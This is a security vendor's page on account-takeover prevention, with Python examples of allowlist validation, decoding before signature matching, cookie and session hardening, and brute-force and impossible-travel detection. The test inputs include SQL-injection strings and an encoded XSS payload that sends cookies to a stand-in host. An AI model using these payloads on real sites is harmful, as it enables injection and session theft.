
Account Takeover (ATO) Prevention

VIRTIS keeps user and customer accounts secure


Prevents Account Abuse

The VIRTIS platform includes ATO protection as a core part of its comprehensive web security software suite. It blocks unauthorized attempts to use or discover credentials, access user accounts, compromise active sessions, and other forms of ATO.


Complete Account Security

VIRTIS uses multivariate analysis, identifying threat traffic not only by its source but also by its identity, behavior, and intent. The platform deploys in a dedicated VPC (Virtual Private Cloud) located immediately in front of the protected network, so malicious traffic is blocked at the edge with minimal added latency.


Many Threats, One Security Solution

Modern threat actors use a variety of sophisticated tactics to wage ATO attacks. VIRTIS protects against each of them: it prevents credential theft, credential discovery, session attacks, and the abuse of valid credentials.

Prevents Credential Theft

Many ATO attacks are intended to steal credential sets from within the targeted network:


System breaches

Allow hackers to exfiltrate account data


Code and command injection

Allow attackers to discover backend resources for access and exploitation


SQL injection

Allows retrieval of private account data from user databases


Complex system-specific ATO techniques

Penetrate the targeted network, e.g., SSRF attacks that reach cloud instance-metadata and IAM services from inside the network in order to obtain credentials

VIRTIS defends against these forms of credential theft with several layers:

“Negative security” (blacklisting)

VIRTIS maintains a comprehensive database of web-related vulnerabilities and automatically blocks requests that match known threat signatures. The platform is a fully managed service: whenever a new threat is discovered, the database is updated with the rule that neutralizes it, and the change is pushed immediately to all VIRTIS deployments worldwide.

“Positive security” (whitelisting)

VIRTIS includes an automatic mechanism (which can be run in a supervised mode) that creates a granular application ruleset for each application it protects. The ruleset strictly defines the allowed headers, HTTP methods, resources, content types, encodings, languages, forms, input fields, and so on; anything outside the ruleset is rejected. Once the ruleset is defined, injection attempts have very little room to work with: a payload must fit inside an allowed field and still pass that field's format rule. The ruleset is only as tight as the formats it defines, so free-text fields that legitimately accept quotes or angle brackets still rely on the signature and sanitization layers.
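As an added example (not VIRTIS code), the following shows how a deny-by-default, per-endpoint profile of this kind is enforced in front of an application. The profile format, the Request class, the cookie and header names, and the sample requests are all assumptions made for illustration:

```python
"""Positive-security (allowlist) request validation.

Added example, not VIRTIS code. The profile format, the Request class and
the sample requests are constructed for illustration: one profile per
(method, path) describes exactly what is allowed, and anything outside it
is rejected before the application sees the request.
"""
import re
from dataclasses import dataclass, field

# Deny-by-default ruleset: every allowed endpoint lists its permitted
# headers, content types, form fields (with a format each) and body size.
RULESET = {
    ("POST", "/login"): {
        "headers": {"host", "user-agent", "accept", "cookie",
                    "content-type", "content-length"},
        "content_types": {"application/x-www-form-urlencoded"},
        "fields": {
            "username": re.compile(r"^[a-z0-9._@-]{3,64}$", re.I),
            "password": re.compile(r"^.{8,128}$", re.S),
        },
        "max_body": 1024,
    },
    ("GET", "/account"): {
        "headers": {"host", "user-agent", "accept", "cookie"},
        "content_types": set(),
        "fields": {},
        "max_body": 0,
    },
}


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    form: dict = field(default_factory=dict)
    body_len: int = 0


def validate(req: Request, ruleset=RULESET):
    """Return (allowed, reason). Anything not explicitly allowed is denied."""
    profile = ruleset.get((req.method.upper(), req.path))
    if profile is None:
        return False, f"no profile for {req.method} {req.path}"
    hdrs = {k.lower(): v for k, v in req.headers.items()}
    extra = set(hdrs) - profile["headers"]
    if extra:
        return False, f"unexpected header(s): {sorted(extra)}"
    if req.body_len > profile["max_body"]:
        return False, f"body of {req.body_len} bytes exceeds {profile['max_body']}"
    if req.body_len:
        ctype = hdrs.get("content-type", "").split(";")[0].strip().lower()
        if ctype not in profile["content_types"]:
            return False, f"content-type not allowed: {ctype!r}"
    unknown = set(req.form) - set(profile["fields"])
    if unknown:
        return False, f"unexpected field(s): {sorted(unknown)}"
    for name, pattern in profile["fields"].items():
        value = req.form.get(name)
        if value is None:
            return False, f"missing field: {name}"
        if not pattern.match(value):
            return False, f"field {name!r} fails its format rule"
    return True, "ok"


COMMON = {"Host": "app.example", "User-Agent": "Mozilla/5.0", "Accept": "*/*"}
FORM = {**COMMON, "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "41"}

# Constructed sample requests.
LOGIN_OK = Request("POST", "/login", FORM,
                   {"username": "alice@example", "password": "correct horse"}, body_len=41)
# Same endpoint, but the username carries a SQL tautology: the field's
# format rule rejects it without any attack signature being involved.
LOGIN_INJECT = Request("POST", "/login", FORM,
                       {"username": "admin' OR 1=1--", "password": "whatever1"}, body_len=41)
# A header the profile never listed (here, a spoofed proxy header).
LOGIN_EXTRA_HEADER = Request("POST", "/login", {**FORM, "X-Forwarded-Host": "evil.example"},
                             {"username": "alice@example", "password": "correct horse"}, body_len=41)
# An endpoint with no profile at all.
DEBUG_ENDPOINT = Request("GET", "/debug/env", COMMON)

if __name__ == "__main__":
    for label, req in [("ok", LOGIN_OK), ("inject", LOGIN_INJECT),
                       ("extra header", LOGIN_EXTRA_HEADER), ("unprofiled", DEBUG_ENDPOINT)]:
        print(f"{label:13} -> {validate(req)}")
```

The order of checks matters in practice: cheap structural checks (unknown endpoint, unexpected header, oversized body) run before per-field pattern matching, so a flood of malformed requests is rejected before any regular expression runs on attacker-controlled input.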

Input Sanitization

VIRTIS includes a variety of protective mechanisms to sanitize and validate all content (headers and payloads) of incoming traffic. These are designed to defeat attempts to bypass threat detection, for example when attackers wrap a hostile payload in nested encodings (double percent-encoding, HTML entities) so that it does not match a signature as it appears on the wire.
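An added example of the nested-encoding evasion and the canonicalization that defeats it (this is illustrative code, not VIRTIS's inspection engine; the signature list and the sample values are constructed):

```python
"""Canonicalise request values before matching threat signatures.

Added example, not VIRTIS code. The signature list and the sample values
are constructed. The point: a signature applied to the raw wire bytes
misses a double-percent-encoded or entity-encoded payload, while the same
signature applied to the canonical form catches it.
"""
import html
import re
from urllib.parse import unquote

# Decoding is repeated until the value stops changing, with a hard cap so a
# value that keeps "decoding" cannot burn CPU.
MAX_DECODE_ROUNDS = 5

SIGNATURES = [
    ("sqli-tautology", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("xss-script-tag", re.compile(r"<script\b", re.I)),
]


def canonicalize(value: str) -> str:
    """Percent-decode and entity-decode until stable, drop NULs, lower-case."""
    current, previous, rounds = value, None, 0
    while current != previous and rounds < MAX_DECODE_ROUNDS:
        previous = current
        current = unquote(current)        # %27 -> '   (and %2527 -> %27 -> ')
        current = html.unescape(current)  # &#39; or &lt; -> ' or <
        current = current.replace("\x00", "")
        rounds += 1
    return current.lower()


def find_signatures(value: str, canonical: bool = True):
    """Names of the signatures that match. canonical=False shows what a
    naive matcher working on the raw value would see."""
    subject = canonicalize(value) if canonical else value
    return [name for name, pattern in SIGNATURES if pattern.search(subject)]


# Constructed hostile inputs as they would appear on the wire.
DOUBLE_ENCODED_SQLI = "admin%2527%2520OR%25201%253D1%2520--"
ENTITY_ENCODED_XSS = ("&lt;script&gt;document.location='//x.example/?c='"
                      "+document.cookie&lt;/script&gt;")
MIXED_UNION = "1%20%26%2385%3BNION%20SELECT%20username%2Cpassword%20FROM%20users"
BENIGN = "100%25%20satisfied%20%26%20happy"

if __name__ == "__main__":
    for label, raw in [("double-encoded sqli", DOUBLE_ENCODED_SQLI),
                       ("entity-encoded xss", ENTITY_ENCODED_XSS),
                       ("mixed union", MIXED_UNION), ("benign", BENIGN)]:
        print(f"{label:20} raw={find_signatures(raw, canonical=False)} "
              f"canonical={find_signatures(raw)}")
```

Two practitioner notes: the decision is made on the canonical form, but the original bytes are what get forwarded (or dropped), so canonicalization never alters legitimate data; and the round cap is not optional, because unbounded decode loops are themselves a denial-of-service vector.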

Other I/O Hardening

VIRTIS can run custom code at any point during processing and can harden the traffic stream in both directions (incoming and outgoing). For example, when a new cookie attribute or request header is introduced (by browser vendors for cookies, or by a cloud provider to mitigate SSRF against its services), VIRTIS can be programmed to add it to the I/O stream, even if the application servers themselves cannot.

Prevents Session Attacks

If attackers can take control of an active session, they can change the user’s password, contact information, and other details to take over the account. To accomplish this, cybercriminals can use a variety of techniques to discover session tokens, and then use them to perform ATO:


Man-in-the-Middle (MITM)

Attackers intercept user I/O and sniff the traffic


Cross-Site Scripting (XSS)

Cybercriminals plant hostile scripts within applications, which can compromise users' session tokens.


Cross-Site Request Forgery

Attackers craft a malicious link or page; when a logged-in victim loads it, the browser attaches the victim's session cookie and the forged request performs hostile actions within their account.


Session Side Jacking

Applications that do not serve every request over TLS (or that send the session cookie without the Secure attribute) are vulnerable to attackers sniffing the post-authentication traffic and replaying the session token.


Session Fixation

Attackers trick victims into authenticating sessions with tokens generated by the attackers.


Malware

Hackers install malware on victims' systems, and then sniff and capture network traffic, including session tokens.
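The following added example (not VIRTIS code) ties the I/O-hardening idea from the credential-theft section to the session attacks listed here. It shows two independent defences: rewriting an upstream Set-Cookie at the edge so the session cookie always carries Secure, HttpOnly and SameSite (which closes the side-jacking, XSS-theft and cross-site-request paths respectively), and issuing a fresh session id at login, which is what defeats session fixation. The cookie name, the sample headers and the tiny session store are assumptions:

```python
"""Session hardening at the proxy and at login.

Added example, not VIRTIS code; the cookie name, header samples and the
session store are assumptions.
  1. harden_set_cookie() rewrites an upstream Set-Cookie so the session
     cookie carries Secure (never sent in plaintext, which side jacking and
     MITM rely on), HttpOnly (not readable by injected script) and
     SameSite=Lax (not attached to cross-site POSTs), even when the
     application server did not set them.
  2. SessionStore shows why minting a new session id at login defeats
     session fixation: the id the attacker planted never becomes an
     authenticated session.
"""
import secrets

SESSION_COOKIE = "sid"


def harden_set_cookie(header_value: str) -> str:
    """Add missing Secure/HttpOnly/SameSite attributes to the session cookie.
    Other cookies, and attributes the app already set, are left untouched."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].partition("=")[0].strip()
    if name != SESSION_COOKIE:
        return header_value
    attrs = {p.partition("=")[0].lower(): p for p in parts[1:]}
    attrs.setdefault("secure", "Secure")
    attrs.setdefault("httponly", "HttpOnly")
    attrs.setdefault("samesite", "SameSite=Lax")
    return "; ".join([parts[0], *attrs.values()])


class SessionStore:
    """Minimal in-memory session table: sid -> authenticated username."""

    def __init__(self):
        self._sessions = {}

    def user_for(self, sid):
        return self._sessions.get(sid)

    def login_vulnerable(self, sid, username):
        # Accepts whatever id the client presented and marks it logged in.
        # If an attacker planted that id on the victim, the attacker owns it.
        self._sessions[sid] = username
        return sid

    def login_hardened(self, sid, username):
        # Discard the presented id and mint an unguessable new one; the
        # planted id is never associated with the authenticated user.
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = username
        return new_sid


def fixation_attempt(store: SessionStore, hardened: bool) -> bool:
    """Attacker plants a sid on the victim (e.g. via a crafted link), the
    victim logs in with it, the attacker then presents the same sid.
    Returns True if the attacker ends up authenticated as the victim."""
    planted = "attacker-chosen-sid"
    login = store.login_hardened if hardened else store.login_vulnerable
    login(planted, "victim")
    return store.user_for(planted) == "victim"


if __name__ == "__main__":
    print(harden_set_cookie("sid=abc123; Path=/"))
    print(harden_set_cookie("theme=dark; Path=/"))
    print("fixation succeeds vs vulnerable login:", fixation_attempt(SessionStore(), False))
    print("fixation succeeds vs hardened login:  ", fixation_attempt(SessionStore(), True))
```

Adding SameSite at the edge is a policy decision, not a free fix: an application that legitimately needs its session cookie on cross-site requests (embedded widgets, some SSO flows) will break under Lax, so the rewrite should be scoped to the cookies and paths where it is known to be safe.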


Prevents Credential Discovery

When threat actors cannot steal valid credential sets, they attempt to discover them in other ways, including stuffing credentials and brute-forcing login forms. Modern threat actors can be quite sophisticated in their abilities to evade detection: for example, a single brute-force attack can include millions of access attempts, each of which originates from a different IP address in order to avoid rate limiting.

VIRTIS defeats these tactics by accurately tracking traffic sources despite IP and geolocation rotation and other attempts to mask the requestor's identity. The platform includes granular security ruleset configuration: policies can be defined for broad segments of an application's traffic or customized for individual URLs. Policy violations can trigger a range of configurable responses, from autobanning the requestor to merely monitoring a traffic source's behavior.
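An added example (not VIRTIS code) of why a per-IP rate limit alone misses the rotating-source attack described above, and what correlation catches it. The log format, the thresholds, the use of User-Agent as a stand-in for a richer client fingerprint, and the sample events are all constructed:

```python
"""Detecting a distributed brute-force run that rotates source IPs to stay
under per-IP rate limits.

Added example, not VIRTIS code. The log format, thresholds and sample
events are constructed. A per-IP limit sees at most one failure per source
and stays silent; correlating failures by target account, and by a request
fingerprint shared across many sources (User-Agent here, standing in for
richer fingerprints), exposes the run.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class LoginEvent:
    ts: int        # seconds
    ip: str
    username: str
    result: str    # "ok" or "fail"
    ua: str        # client fingerprint proxy


def detect(events, window_s=600, per_ip_limit=5, account_ip_limit=10,
           fingerprint_ip_limit=10, fingerprint_fail_ratio=0.9):
    """Return findings for the last window_s seconds of events."""
    empty = {"blocked_ips": [], "sprayed_accounts": [], "suspect_fingerprints": []}
    if not events:
        return empty
    newest = max(e.ts for e in events)
    recent = [e for e in events if newest - e.ts <= window_s]

    fails_per_ip = defaultdict(int)                  # the classic limiter
    ips_failing_per_account = defaultdict(set)       # many sources, one target
    per_fp = defaultdict(lambda: {"ips": set(), "fails": 0, "total": 0})
    for e in recent:
        per_fp[e.ua]["ips"].add(e.ip)
        per_fp[e.ua]["total"] += 1
        if e.result == "fail":
            fails_per_ip[e.ip] += 1
            ips_failing_per_account[e.username].add(e.ip)
            per_fp[e.ua]["fails"] += 1

    return {
        "blocked_ips": sorted(ip for ip, n in fails_per_ip.items() if n >= per_ip_limit),
        "sprayed_accounts": sorted(u for u, ips in ips_failing_per_account.items()
                                   if len(ips) >= account_ip_limit),
        "suspect_fingerprints": sorted(
            fp for fp, s in per_fp.items()
            if len(s["ips"]) >= fingerprint_ip_limit
            and s["fails"] / s["total"] >= fingerprint_fail_ratio),
    }


def constructed_log():
    """A few legitimate logins plus a 25-source, one-attempt-per-source run
    against one account (all addresses from documentation ranges)."""
    browser = "Mozilla/5.0 (Macintosh) Safari/605.1"
    events = [
        LoginEvent(1000, "203.0.113.10", "alice", "ok", browser),
        LoginEvent(1001, "203.0.113.11", "bob", "fail", browser),   # a typo
        LoginEvent(1003, "203.0.113.11", "bob", "ok", browser),
        LoginEvent(1004, "198.51.100.7", "carol", "ok", browser),
    ]
    for i in range(25):
        events.append(LoginEvent(1100 + i, f"192.0.2.{i + 1}", "alice", "fail",
                                 "python-requests/2.31"))
    return events


if __name__ == "__main__":
    for key, value in detect(constructed_log()).items():
        print(f"{key}: {value}")
```

The three outputs map onto the graduated responses mentioned above: a fingerprint cluster is a candidate for challenge or monitoring rather than an outright ban (a User-Agent string is trivially forged, and a shared corporate NAT can look similar), whereas a sprayed account justifies stepping up authentication for that account regardless of source. Credential stuffing proper (many accounts, one attempt each) does not trip the per-account signal at all; it shows up only in the fingerprint cluster, which is why the second signal is needed.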

VIRTIS uses a variety of techniques to prevent credential-discovery and session attacks from succeeding, including:


Fine-Grained ACLs

VIRTIS provides high-precision ACL (Access Control List) capabilities. For a new deployment, its ACLs exclude 75-80 percent of hostile traffic out of the box; the rate is generally much higher after only a few days of fine-tuning and customization for the applications.


Comm Layer Hardening

VIRTIS can customize request and response parameters within the traffic stream to eliminate a number of common session attack vectors.


Session Monitoring

VIRTIS detects suspicious activity during active sessions (e.g., a sudden change of geolocation) and challenges users whose activity is suspect.


User Validation

Behavioral biometrics verify that each user's activity is consistent with that user's past behavior.
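An added example (not VIRTIS code) of the session-monitoring check mentioned above: a mid-session geolocation jump that no traveller could make is flagged for a challenge. It assumes the edge has already resolved each request's source address to coordinates; the session events, the speed ceiling and the jitter floor are constructed values:

```python
"""Session monitoring: flag a mid-session geolocation jump that no traveller
could make ("impossible travel") and challenge the user.

Added example, not VIRTIS code. Assumes the edge has already resolved each
request's source address to coordinates; the session events, the speed
ceiling and the distance floor (below which geo-IP jitter is ignored) are
constructed values.
"""
import math
from dataclasses import dataclass

SPEED_CEILING_KMH = 900.0   # roughly airliner speed
JITTER_FLOOR_KM = 50.0      # geo-IP resolution noise is not a "move"
EARTH_RADIUS_KM = 6371.0


@dataclass(frozen=True)
class SessionEvent:
    ts: int         # seconds
    sid: str
    lat: float
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def check_session(events):
    """Walk one session's events in time order; return a list of
    (event index, implied speed km/h, action) for each impossible hop."""
    findings = []
    ordered = sorted(events, key=lambda e: e.ts)
    for i in range(1, len(ordered)):
        prev, cur = ordered[i - 1], ordered[i]
        dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
        if dist < JITTER_FLOOR_KM:
            continue
        dt_h = (cur.ts - prev.ts) / 3600.0
        # A real move within the same second has no finite speed: treat as infinite.
        speed = math.inf if dt_h <= 0 else dist / dt_h
        if speed > SPEED_CEILING_KMH:
            findings.append((i, round(speed, 1), "challenge"))
    return findings


# Constructed session: New York -> Philadelphia (plausible), then Tokyo
# thirty minutes later (not plausible).
SESSION = [
    SessionEvent(0,    "s1", 40.71, -74.01),    # New York
    SessionEvent(7200, "s1", 39.95, -75.17),    # Philadelphia, 2 h later
    SessionEvent(9000, "s1", 35.68, 139.69),    # Tokyo, 30 min later
]

if __name__ == "__main__":
    for index, speed, action in check_session(SESSION):
        print(f"event {index}: implied {speed} km/h -> {action}")
```

The jitter floor is what keeps this check usable: geo-IP databases routinely place a mobile user tens of kilometres from the previous request, and a check without the floor would challenge almost every session. Conversely, VPN exits and CDN egress points produce genuine long hops, so the response is a challenge (re-authentication or step-up) rather than an immediate ban.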

Prevents Abuse of Valid Credentials

Attackers can obtain valid credential sets via phishing, social engineering, and other methods. They then use the credentials to access and take over the accounts. This is the most difficult form of ATO to prevent, because it does not rely on security holes, malicious inputs, brute-force tactics, or other hostile activity. The attacker simply logs into the application, as the actual user would do.

Nevertheless, VIRTIS can detect and block even this form of ATO. VIRTIS goes beyond traditional approaches to security, and adds a number of additional layers of analysis. It uses UEBA and Machine Learning to build fine-grained biometric behavioral profiles for all legitimate users and customers. The platform learns and understands users’ characteristics, and how they interact with the sites, applications, and APIs that it protects.

VIRTIS uses multivariate analysis to distinguish legitimate users from threat actors, and makes decisions not only according to the traffic source but also according to each user's identity, behavior, and intent. A threat actor operating a stolen account will, unavoidably, differ from the real user in a number of characteristics of how they interact with the application, and VIRTIS detects these differences as soon as they appear.

Furthermore, every attacker must, at some point, deviate from legitimate user behavior. When a hostile actor attempts to abuse an account, VIRTIS blocks the traffic source, preventing further access.


Automatic Protection

VIRTIS analyzes global traffic patterns, identifying and adapting to new attack techniques. As a fully managed platform, VIRTIS is updated immediately as new security policies are issued. Even as hackers develop new attack techniques, VIRTIS provides robust protection, automatically.


Full Traffic Transparency

VIRTIS provides unparalleled insights into your incoming traffic. An intuitive Dashboard displays full details (headers and payloads) of all incoming requests in real time. A comprehensive View Log interface provides the ability to view historical data and rapidly construct sophisticated queries against it, showing patterns and identifying anomalous activity in the traffic stream.

A Complete Web Security Solution

ATO protection is one component of the VIRTIS suite, alongside:

Next Generation WAF

API Security

DoS & DDoS Protection

Advanced Bot Management

Account Takeover (ATO)

CDN Integration

Load Balancing

Automated Resource Scaling

Real Time Analytics

SIEM/SOC Integration

Human Behavioral Analysis

Compliance
